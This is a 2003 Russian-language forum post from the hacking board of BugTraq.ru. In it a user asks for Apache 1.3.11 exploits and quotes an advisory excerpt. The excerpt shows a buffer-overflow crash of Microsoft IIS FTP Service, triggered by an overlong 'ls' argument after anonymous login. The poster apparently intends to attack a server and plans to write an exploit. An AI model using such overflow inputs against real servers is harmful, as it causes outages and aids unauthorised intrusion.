информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Spanning Tree Protocol: недокументированное применениеВсе любят медГде водятся OGRы
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Бэкдор в xz/liblzma, предназначенный... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Эксплоит на Microsoft FTP Server? Лучше ломать через web-сервер !!! 16.11.03 16:46  Число просмотров: 2690
Автор: Likvidator Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Да я в начале тоже немного запулся. В общем на 80 порту зависает Apatch 1.3.11 и перекрывает ИИС. Я для него ничего хорошего не нашел. Можно если кто знает где есть сплоиты для Apatch 1.3.11 пожалуйста скиньте ссылочку.
]d1vEr[ насчет фтп. Я бы написал сам для него эксплоит, но именно но. В google.com набери Microsoft FTP Server (Version 3.0) Exploit. Вот из одних из ссылок написано, что в FTP Server 3.0 есть переполнение:
****************************************
Lets look at the following example attack. [Comments are in brackets.] The server must either have anonymous access rights or an attacker must have an account.

C:\>ftp guilt.xyz.com
Connected to guilt.xyz.com.
220 GUILT Microsoft FTP Service (Version 4.0).
User (marc.xyz.com:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
[The server has now processed our long NLST request and has crashed]
-> ftp: get :Connection reset by peer
[Our ftp client looses connection... that is a given]

The above example uses 316 characters to overflow. This is the smallest possible buffer to pass that will overflow IIS. Lets take a look at the server side happenings. On the server side we have an "Application Error" message for inetinfo.exe. "The instruction at '0x710f8aa2' referenced memory at '0x41414156'. The memory could not be 'read'."
*******************************************
Как написанно в данном дукументе он срабатывает на 3 и 4 иис.Я установил IIS 3.0 и проделав все действия к сожалению переполнения не произошло. Если у кого-то есть информация по переполнениям в этом фтп сервере сообщите пожалуйста, эксплоит как-нибудь накалякую сам.
Благодарю за внимание...
<hacking> Поиск 






Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach